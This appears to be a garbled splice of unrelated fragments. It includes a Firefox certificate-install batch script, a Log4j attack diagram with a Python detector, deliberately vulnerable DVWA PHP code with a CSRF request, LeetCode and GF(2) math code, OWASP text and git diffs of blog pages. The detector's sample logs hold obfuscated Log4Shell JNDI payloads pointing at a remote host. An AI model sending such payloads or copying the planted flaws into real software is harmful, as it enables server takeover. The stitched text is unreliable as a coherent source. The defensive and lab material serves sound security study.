        rem for server certificates the trust flags need C (e.g. "C,,"), see certutil -H above
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!
        rem show the certificate store after the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
    ) else (
        echo no or more
    )
) ELSE (
    echo no
)
goto :eof

:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem function 2: for Firefox 49 and above, enable security.enterprise_roots.enabled

set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg
set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg%" (
        copy "%source_file_cfg%" "%dest_dir_cfg%"
    ) else (
        echo Directory %dest_dir_cfg% does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg_x86%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg_x86%" (
        copy "%source_file_cfg%" "%dest_dir_cfg_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set source_file_js=C:\firefoxinstallcert\local-settings.js
set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js%" (
        copy "%source_file_js%" "%dest_dir_js%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)

set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js_x86%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js_x86%" (
        copy "%source_file_js%" "%dest_dir_js_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)
goto :eof
The second version of the script keeps the version detection and :function1 of the first version verbatim; only :function2 changes:
:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem function 2: for Firefox 49 and above, enable security.enterprise_roots.enabled by adding a user.js file to the profile

rem default profile directory
set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles"
rem look for the folder whose name contains "default", i.e. the profile folder
set "searchString=default"
set source_user_js=C:\firefoxinstallcert\user.js
rem copy user.js into the profile directory (paths are quoted: %APPDATA% may contain spaces)

IF EXIST "%parentFolder%" (
    for /d %%F in ("%parentFolder%\*") do (
        echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1
        if errorlevel 1 (
            echo default Folder not found.
        ) else (
            echo default Folder found.
            rem build the full path
            set "all_default_path=%parentFolder%\%%~nxF"
            echo !all_default_path!
            copy "%source_user_js%" "!all_default_path!"
        )
    )
) ELSE (
    echo no
)
goto :eof
pause
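The batch script above finds the profile by a substring match on "default" and copies a fixed user.js over whatever is there. The following Python is an added example, not part of the original script: it reads profiles.ini (the file Firefox itself uses to record the default profile) and merges the pref into an existing user.js without discarding other settings. The profiles.ini text is constructed for the example, and the handling of `[Install...]` sections is an assumption about the layout newer Firefox versions write.

```python
import configparser
import json
import re

# Constructed profiles.ini (not copied from a real machine).
SAMPLE_PROFILES_INI = """\
[General]
StartWithLastProfile=1
Version=2

[Profile0]
Name=default
IsRelative=1
Path=Profiles/abcd1234.default
Default=1

[Profile1]
Name=work
IsRelative=1
Path=Profiles/ef567890.work
"""

# The pref the batch script wants to set.
ENTERPRISE_ROOTS = {"security.enterprise_roots.enabled": True}

# One user_pref("name", value); line.
_PREF = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+?)\);\s*$')


def default_profile_path(ini_text):
    """Relative path of the default profile as recorded in profiles.ini."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case (Path, Default)
    cp.read_string(ini_text)
    # Assumption: newer Firefox records the default profile per install in an
    # [Install<hash>] section; otherwise use the ProfileN entry flagged Default=1,
    # and as a last resort the first profile listed.
    for sec in cp.sections():
        if sec.startswith("Install") and cp.has_option(sec, "Default"):
            return cp[sec]["Default"]
    profiles = [s for s in cp.sections() if s.startswith("Profile")]
    for sec in profiles:
        if cp[sec].get("Default") == "1":
            return cp[sec]["Path"]
    return cp[profiles[0]]["Path"] if profiles else None


def _render(value):
    """Python value -> user.js literal."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    return json.dumps(value)


def merge_user_js(existing_text, prefs):
    """Return user.js text with `prefs` applied; unrelated lines are kept and
    a pref that already exists is rewritten in place rather than duplicated."""
    out, seen = [], set()
    for line in existing_text.splitlines():
        m = _PREF.match(line)
        if m and m.group(1) in prefs:
            if m.group(1) in seen:
                continue  # drop an earlier duplicate of the same pref
            out.append('user_pref("%s", %s);' % (m.group(1), _render(prefs[m.group(1)])))
            seen.add(m.group(1))
        else:
            out.append(line)
    for name, value in prefs.items():
        if name not in seen:
            out.append('user_pref("%s", %s);' % (name, _render(value)))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print(default_profile_path(SAMPLE_PROFILES_INI))
    print(merge_user_js('user_pref("app.update.auto", true);\n', ENTERPRISE_ROOTS))
```

user.js is re-applied at every start, so a value set there keeps overriding what the user changes in about:config. For Firefox 60 and later the same effect is available through enterprise policies (a policies.json with Certificates.ImportEnterpriseRoots), which does not depend on locating profile folders at all.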
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
graph LR
    A[Attacker crafts malicious payload with JNDI lookup] --> C{Log4j parses: Contains JNDI lookup?}
    C -->|Yes| D[Execute JNDI lookup]
    C -->|No| E[Normal log]
    D --> F[Connect to attacker's server]
    F --> G[Download & execute malicious class]
    G --> H[Attacker gains server control]
    classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px;
    classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px;
    classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px;
    classDef danger fill:#ffebee,stroke:#333,stroke-width:1px;
    class A,H highlight;
    class C decision;
    class G danger;
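The diagram covers the exploitation path. For the detection side, here is an added Python example (not from the original post) that undoes the lookup obfuscations commonly used to slip past a plain `${jndi:` string match and flags the request lines that still contain one. The log lines are constructed, and the set of tricks handled (`${lower:}`/`${upper:}`, the `:-` default-value form, URL encoding) is an assumption about what a first-pass detector should cover, not an exhaustive list.

```python
import re
import urllib.parse

# Innermost ${...} lookup (no nested braces inside it).
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# Constructed sample log lines (not captured from a real system).
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /?q=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200',
    'User-Agent: ${${lower:j}${upper:n}di:rmi://203.0.113.9/x}',
    'X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9/y}',
    'GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fz%7D HTTP/1.1',
    'ts=${date:yyyy-MM-dd} level=INFO msg=service started',
    '10.0.0.7 - - "GET /index.html HTTP/1.1" 200',
]


def _resolve(m):
    """Collapse one innermost lookup the way Log4j 2 would evaluate it."""
    body = m.group(1)
    head, _, tail = body.partition(":")
    if head.lower() in ("lower", "upper"):  # ${lower:J} -> J (case is folded later)
        return tail
    if ":-" in body:                         # ${env:NOPE:-j} or ${::-j} -> default value j
        return body.split(":-", 1)[1]
    return m.group(0)                        # ${jndi:...}, ${date:...} etc. stay as they are


def normalize(text):
    """URL-decode, then resolve nested lookups innermost-first until nothing changes."""
    text = urllib.parse.unquote(text)
    while True:
        new = _LOOKUP.sub(_resolve, text)
        if new == text:
            return text.lower()
        text = new


def is_jndi_probe(line):
    return "${jndi:" in normalize(line)


def scan(lines):
    """Indices of the lines that contain a JNDI lookup after normalisation."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LOGS):
        print(i, "->", normalize(SAMPLE_LOGS[i]))
```

Matching on the normalised string rather than the raw line is the point: lines 1 to 3 of the sample never contain the literal text `${jndi:` as received. A legitimate lookup such as `${date:...}` is left alone and is not reported.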
sequenceDiagram
    Frontend->>Frontend: user opens the page for the first time
    Frontend->>Backend: version: 0, request a data sync
    Backend->>Frontend: return the data together with the largest version
    note right of Backend: returned structure: {"version":100, data:[{},{},{}]}
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
Blind SQL and Blind OS Command injection
Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
Cross-Site Request Forgery (CSRF)
AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
Malicious, unrestricted file uploads and backdoor files
Authentication, authorization and session management issues
Arbitrary file access and directory traversals
Local and remote file inclusions (LFI/RFI)
Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
HTTP parameter pollution and HTTP response splitting
Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
Unvalidated redirects and forwards, and cookie poisoning
Cookie poisoning and insecure cryptographic storage
Server Side Request Forgery (SSRF)
XML External Entity attacks (XXE)
And much much much more…
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];
The Referer header is checked, but only as a case-insensitive substring match against SERVER_NAME.

GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1
Host: 49.232.78.252:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://49.232.78.252:81/vulnerabilities/csrf/
Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium
Upgrade-Insecure-Requests: 1
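Why the substring check is bypassable, as an added Python example (not DVWA code): `stripos` passes for any Referer that merely contains the server name somewhere in the URL, while comparing the parsed origin (scheme, host and port) does not. The attacker host names are made up for the example; the server name and port come from the request above.

```python
from urllib.parse import urlsplit

# Values taken from the request shown above.
SERVER_NAME = "49.232.78.252"
EXPECTED_ORIGIN = "http://49.232.78.252:81"


def dvwa_medium_check(referer, server_name=SERVER_NAME):
    """Mirror of stripos($_SERVER['HTTP_REFERER'], $_SERVER['SERVER_NAME']) !== false."""
    return referer is not None and server_name.lower() in referer.lower()


def _origin(url):
    """(scheme, host, port) of a URL, or None when it is not a usable http(s) origin."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    port = parts.port or (443 if parts.scheme == "https" else 80)  # .port raises ValueError on junk
    return (parts.scheme, parts.hostname.lower(), port)


def strict_origin_check(header_value, expected_origin=EXPECTED_ORIGIN):
    """Accept only when the parsed origin of the Origin (or Referer) header equals
    our own origin. A missing or unparsable header is rejected, not waved through."""
    if not header_value:
        return False
    try:
        seen = _origin(header_value)
    except ValueError:
        return False
    return seen is not None and seen == _origin(expected_origin)


# Constructed Referer values: the first is legitimate, the rest are attacker pages
# whose URL merely contains the server name somewhere.
CASES = [
    "http://49.232.78.252:81/vulnerabilities/csrf/",
    "http://attacker.example/49.232.78.252/csrf.html",
    "http://49.232.78.252.attacker.example/",
    "http://attacker.example/?next=http://49.232.78.252:81/",
    None,
]


def compare(cases=CASES):
    """(weak verdict, strict verdict) for each case."""
    return [(dvwa_medium_check(r), strict_origin_check(r)) for r in cases]


if __name__ == "__main__":
    for case, verdict in zip(CASES, compare()):
        print(verdict, case)
```

Even the strict comparison is only a secondary defence: browsers may strip Referer, so the check should run on the Origin header where present, and the form still needs an anti-CSRF token (DVWA's high level) and SameSite cookies.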
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    ( $uploaded_size < 100000 ) ) {

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
else {
    // Invalid file
    echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'], $_POST['g-recaptcha-response'] );

// Did the CAPTCHA fail?
if( !$resp ) {
    // What happens when the CAPTCHA was entered incorrectly
    $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
    $hide_form = false;
    return;
}
else {
    // CAPTCHA was correct. Do both new passwords match?
    if( $pass_new == $pass_conf ) {
        // Show next stage for the user
        echo "
            <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
            <form action=\"#\" method=\"POST\">
                <input type=\"hidden\" name=\"step\" value=\"2\" />
                <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                <input type=\"submit\" name=\"Change\" value=\"Change\" />
            </form>";
    }
    else {
        // Both new passwords do not match.
        $html     .= "<pre>Both passwords must match.</pre>";
        $hide_form = false;
    }
}
}
// Check to see if both password match
if( $pass_new == $pass_conf ) {
    // They do!
    $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    // DVWA stores an unsalted MD5 of the password; nothing here checks that step 1 was passed
    $pass_new = md5( $pass_new );

    // Feedback for the end user
    echo "<pre>Password Changed.</pre>";
}
else {
    // Issue with the passwords matching
    echo "<pre>Passwords did not match.</pre>";
    $hide_form = false;
}
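Step 1 above verifies the CAPTCHA, but step 2 only checks that the hidden field `step=2` and two matching passwords arrived, so a direct POST to step 2 skips the CAPTCHA entirely. As an added Python example (not DVWA code), the following binds the CAPTCHA result to the session with a one-time token that step 2 must present; the class, session identifiers and the in-memory "database" are hypothetical stand-ins for the PHP session and MySQL write.

```python
import secrets


class PasswordChange:
    """Server side of the two-step flow, with step 1's result bound to the session."""

    def __init__(self):
        self._step_tokens = {}  # session_id -> one-time token issued after a passed CAPTCHA
        self.passwords = {}     # user -> new password (stand-in for the database write)

    def step1(self, session_id, captcha_passed, new, conf):
        """Returns the token to embed in the confirmation form, or None on failure."""
        if not captcha_passed or new != conf:
            return None
        token = secrets.token_urlsafe(16)
        self._step_tokens[session_id] = token  # replaces any earlier token
        return token

    def step2(self, session_id, user, token, new, conf):
        """Only succeeds once per step 1, and only with the token step 1 handed out."""
        expected = self._step_tokens.pop(session_id, None)  # consumed even on failure
        if expected is None or token is None:
            return False
        if not secrets.compare_digest(expected, token):
            return False
        if new != conf:
            return False
        self.passwords[user] = new
        return True


def dvwa_medium_step2(step, new, conf):
    """The flaw on the page: step 2 trusts the client-supplied hidden field."""
    return step == "2" and new == conf


if __name__ == "__main__":
    print("vulnerable, no CAPTCHA ever solved:", dvwa_medium_step2("2", "123", "123"))
    flow = PasswordChange()
    print("fixed, no step 1:", flow.step2("s1", "admin", "guess", "123", "123"))
    tok = flow.step1("s1", True, "123", "123")
    print("fixed, with token:", flow.step2("s1", "admin", tok, "123", "123"))
    print("fixed, replay:", flow.step2("s1", "admin", tok, "123", "123"))
```

The token must be generated and stored server-side; a hidden field alone, whatever its value, is still client-controlled, which is exactly the problem with `step=2`.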
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
        " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';
Recursive method: peel off the outer ring, then recurse on the inner sub-matrix.

from typing import List

class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        m = len(matrix)
        if m == 0 or len(matrix[0]) == 0:
            return []
        n = len(matrix[0])
        newlist = list(matrix[0])              # top row (copied so the input is not mutated)
        if m > 1:
            for i in range(1, m):              # right column, top to bottom
                newlist.append(matrix[i][n - 1])
            for j in range(n - 2, -1, -1):     # bottom row, right to left
                newlist.append(matrix[m - 1][j])
            if n > 1:
                for i in range(m - 2, 0, -1):  # left column, bottom to top (row count m, not n)
                    newlist.append(matrix[i][0])
        M = []                                 # inner sub-matrix with the outer ring removed
        for k in range(1, m - 1):
            t = matrix[k][1:-1]
            M.append(t)
        return newlist + self.spiralOrder(M)

Clearer method: keep four boundaries and shrink them after each ring.

class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        res = []
        if len(matrix) == 0:
            return []
        # define the four boundaries
        left = 0
        right = len(matrix[0]) - 1
        top = 0
        bottom = len(matrix) - 1
        # walk one full ring while the boundaries have not crossed
        while top < bottom and left < right:
            for i in range(left, right):
                res.append(matrix[top][i])
            for i in range(top, bottom):
                res.append(matrix[i][right])
            for i in range(right, left, -1):
                res.append(matrix[bottom][i])
            for i in range(bottom, top, -1):
                res.append(matrix[i][left])
            left += 1
            top += 1
            right -= 1
            bottom -= 1
        # a single row or a single column may be left over
        if top == bottom:
            for i in range(left, right + 1):
                res.append(matrix[top][i])
        elif left == right:
            for i in range(top, bottom + 1):
                res.append(matrix[i][left])
        return res
Any polynomial can be written as f(x) = q(x)g(x) + r(x); r(x) is called the remainder, r(x) = f(x) mod g(x).

If there is no remainder, g(x) divides f(x), written g(x) | f(x).

If f(x) has no factor other than itself and 1, f(x) is called an irreducible polynomial (also a prime polynomial).

Polynomials with coefficients in GF(p), taken modulo an irreducible polynomial, form a field.

Euclidean algorithm

a can be written as a = kb + r (a, b, k, r positive integers, r < b), so r = a mod b.
Suppose d is a common divisor of a and b, written d|a, d|b, i.e. both a and b are divisible by d.
Since r = a - kb, dividing both sides by d gives r/d = a/d - kb/d = m; the right-hand side shows m is an integer, so d|r.
Hence d is also a common divisor of b and a mod b.
Conversely, suppose d is a common divisor of b and a mod b; then d|b and d|(a - k*b) for an integer k, so d|a, and d is a common divisor of a and b.
Therefore (a, b) and (b, a mod b) have the same common divisors, so their greatest common divisors are equal. QED.

Any integer that divides both a and b also divides a - b (and b); taking that integer to be gcd(a, b), it can be no larger than the greatest common divisor of a - b and b: gcd(a, b) <= gcd(a - b, b).
Likewise any integer that divides a - b and b divides a and b; taking it to be gcd(a - b, b), it can be no larger than gcd(a, b): gcd(a - b, b) <= gcd(a, b).
Hence gcd(a, b) = gcd(a - b, b).
Since there is always an integer n with a - n*b = a mod b, iterating gives gcd(a - b, b) = gcd(a - 2b, b) = ... = gcd(a - n*b, b) = gcd(a mod b, b).
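Added example (not from the notes above): Euclid's algorithm as proved above, first on integers and then on polynomials over GF(2), where the same loop with polynomial remainders gives the gcd and the extended version gives inverses in the field GF(2^8) defined by the AES polynomial x^8 + x^4 + x^3 + x + 1. Polynomials are encoded as Python ints with bit i holding the coefficient of x^i; the helper names are mine, and the irreducibility test is plain trial division.

```python
AES_POLY = 0x11B  # x^8 + x^4 + x^3 + x + 1, irreducible, so GF(2)[x] mod it is GF(2^8)


def gcd(a: int, b: int) -> int:
    """Integer gcd via gcd(a, b) = gcd(b, a mod b), as proved above."""
    while b:
        a, b = b, a % b
    return a


def poly_deg(a: int) -> int:
    return a.bit_length() - 1


def poly_mul(a: int, b: int) -> int:
    """Carry-less multiplication: coefficients are added mod 2 (XOR), no reduction."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        b >>= 1
    return r


def poly_divmod(f: int, g: int) -> tuple:
    """Long division f = q*g + r in GF(2)[x]; returns (q, r) with deg r < deg g."""
    if g == 0:
        raise ZeroDivisionError("division by the zero polynomial")
    q = 0
    while f and poly_deg(f) >= poly_deg(g):
        shift = poly_deg(f) - poly_deg(g)
        q ^= 1 << shift
        f ^= g << shift
    return q, f


def poly_gcd(a: int, b: int) -> int:
    """The Euclidean loop again, with the polynomial remainder in place of a mod b."""
    while b:
        a, b = b, poly_divmod(a, b)[1]
    return a


def is_irreducible(p: int) -> bool:
    """Trial division by every polynomial of degree 1..deg(p)//2."""
    d = poly_deg(p)
    for g in range(2, 1 << (d // 2 + 1)):
        if poly_divmod(p, g)[1] == 0:
            return False
    return d >= 1


def poly_inverse(a: int, mod: int) -> int:
    """Extended Euclid: t with a*t = 1 (mod `mod`). Invariant: t_i * a = r_i (mod `mod`)."""
    r0, r1 = mod, poly_divmod(a, mod)[1]
    t0, t1 = 0, 1
    while r1:
        q, r = poly_divmod(r0, r1)
        r0, r1 = r1, r
        t0, t1 = t1, t0 ^ poly_mul(q, t1)  # subtraction is XOR over GF(2)
    if r0 != 1:
        raise ValueError("not invertible, gcd is %#x" % r0)
    return poly_divmod(t0, mod)[1]


if __name__ == "__main__":
    print(gcd(1071, 462))                       # 21
    print(hex(poly_inverse(0x53, AES_POLY)))    # 0xca, the FIPS-197 worked example
    print(is_irreducible(AES_POLY), is_irreducible(0x101))
```

The modulus must be irreducible for every non-zero element to have an inverse: with x^8 + 1 = (x + 1)^8 in place of the AES polynomial, `poly_inverse` raises for any multiple of x + 1 because the gcd is not 1.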
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
parser.add_argument("--square", help="display a square of a given number", type=int) parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
%% extract watermark
FA2=fft2(FAO);
G=(FA2-FA)/alpha;
GG=G;
for i=1:imsize(1)*0.5
    for j=1:imsize(2)
        GG(M(i),N(j),:)=G(i,j,:);
    end
end
for i=1:imsize(1)*0.5
    for j=1:imsize(2)
        GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:);
    end
end
figure,imshow(GG);title('extracted watermark');
%imwrite(uint8(GG),'extracted watermark.jpg');
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
+
+
+
+
+ <blockquote>
+<p>The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consens
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 浏览器的同源策略与跨站请求伪造(CSRF)
+
+ http://h4m5t.github.io/2021/01/27/%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5/
+ 2021-01-27T16:00:00.000Z
+ 2024-10-13T14:05:28.000Z
+
+ 定义
Telstra Cybersecurity Job SimulationAbouthttps://www.theforage.com/simulations/telstra/cybersecurity-cyyo
+GitHub repository: https://github.com/h4m5t/Telstra_Cybersecurity
+Telstra is Australia’s largest telecommunications company, offering services like mobile phones, internet, and data solutions to millions of customers nationwide. Known for its reliability and innovation, Telstra connects people and businesses, ensuring smooth and effective communication.
+The Telstra Cybersecurity Job Simulati ...
信息收集123456789101112┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]└─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AESTNmap scan report for bizness.htb (10.129.232.1)Host is up (0.040s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http443/tcp open https41845/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 12.65 seconds
+
+1echo "10.129.232. ...
\ No newline at end of file
diff --git a/page/2/index.html b/page/2/index.html
new file mode 100644
index 000000000..b4a5f3f3d
--- /dev/null
+++ b/page/2/index.html
@@ -0,0 +1,327 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
xray下载社区版下载和使用
+注意下载新版的,旧版可能无法加载自定义POC
+https://github.com/chaitin/xray/releases
+使用方法查看help
+xray_windows_amd64.exe webscan --help
+1234567891011121314151617181920212223242526272829Version: 1.9.11/eb0c331d/COMMUNITYNAME: xray - A powerful scanner engine [https://docs.xray.cool]USAGE: [global options] command [command options] [arguments...]COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint ...
HexoWelcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
+Quick StartCreate a new post1$ hexo new "My New Post"
+
+More info: Writing
+Clean1$ hexo clean
+
+Run server1$ hexo server
+
+More info: Server
+Generate static files1$ hexo generate
+
+More info: Generating
+Deploy to remote sites1$ hexo deploy
+
+More info: Deployment
+Actions自动化部署Hexo自动化工作流总是遇到问题,今天终 ...
\ No newline at end of file
diff --git a/page/3/index.html b/page/3/index.html
new file mode 100644
index 000000000..306ff7ec9
--- /dev/null
+++ b/page/3/index.html
@@ -0,0 +1,353 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+bWAPP靶场训练记录,之前就搭好的,一直没练,现在有空练一下
+
+主要内容有:一个很综合的靶场,不错!
+1234567891011121314151617181920SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injectionsBlind SQL and Blind OS Command injectionBash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)Cross-Site Request Forgery (CSRF)AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)Malicious, unrestricted file uploads and backdoor filesAuthentication, authorization and session m ...
+李卫海PPT学习笔记
+
+其他概念Needham-Schroeder协议:
+利用对称密码技术分发密钥。A,B分别与T有静态密钥。借助信任权威T,分发对称密钥Kab
+多项式GCD算法
+重点:模重复平方算法
+123456c=1for i =k-1 to 0: c=(c^2)mod n if ei==1: c=c*m mod n return
+
+难点:AES列混合矩阵计算,有限域上的多项式模运算。
+对合算法
+对合运算:f =f‘ ,模 2加运算是对合运算。密码算法是对和运算,则加密算法=解密算法,工程实现工作量减半。
+同态加密(英语:Homomorphic encryption)是一种加密形式,它允许人们对密文进行特定形式的代数运算得到仍然是加密的结果,将其解密所得到的结果与对明文进行同样的运算结果一样。换言之,这项技术令人们可以在加密的数据中进行诸如检索、比较等操作,得出正确的结果,而在整个处理过程中无需对数据进行解密。其意义在于,真正从根本上解决将数据及其操作委托给第三方时的保密问题,例如对于各种云计算的应用。
+零知识证明是一种特殊的 ...
\ No newline at end of file
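Review bot: the 模重复平方算法 (square-and-multiply) snippet rendered in this excerpt, `c=1 for i =k-1 to 0: c=(c^2)mod n if ei==1: c=c*m mod n return`, ends in a bare `return` with no value, so the algorithm never hands back `c`; the source post should read `return c` after the loop (and the `if ei==1` line indented under the loop) and the site regenerated, since the rendered HTML is what this file commits.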
diff --git a/page/4/index.html b/page/4/index.html
new file mode 100644
index 000000000..44b2b5c37
--- /dev/null
+++ b/page/4/index.html
@@ -0,0 +1,429 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
ISCC练武题适合新手的题,练练手
+WEB-1
+
+打开环境,是一个投票页面
+
+
+题目要求:在20秒之内让左边的票数高过右边的
+
+方法一:Python写脚本模拟点击,实现刷票
+方法二:修改左右客服的ID
+方法三:直接在控制台修改左边票数的数据
+
+WEB-2查看源码
+
+
+是JS编码
+http://www.jsfuck.com/
+打开在线网站,直接提交这串编码即出flag
+
+JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
+It does not depend on a browser, so you can even run it on Node.js.
+Use the form below to convert your own script. Uncheck “eval source” to get back a p ...
\ No newline at end of file
diff --git a/page/5/index.html b/page/5/index.html
new file mode 100644
index 000000000..ff98d8013
--- /dev/null
+++ b/page/5/index.html
@@ -0,0 +1,447 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+3sum跟之前的2sum有点像,但难度更大一些
+
+leetcode.15
+题目描述 :123Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.Notice that the solution set must not contain duplicate triplets.
+
+范围0 <= nums.length <= 3000
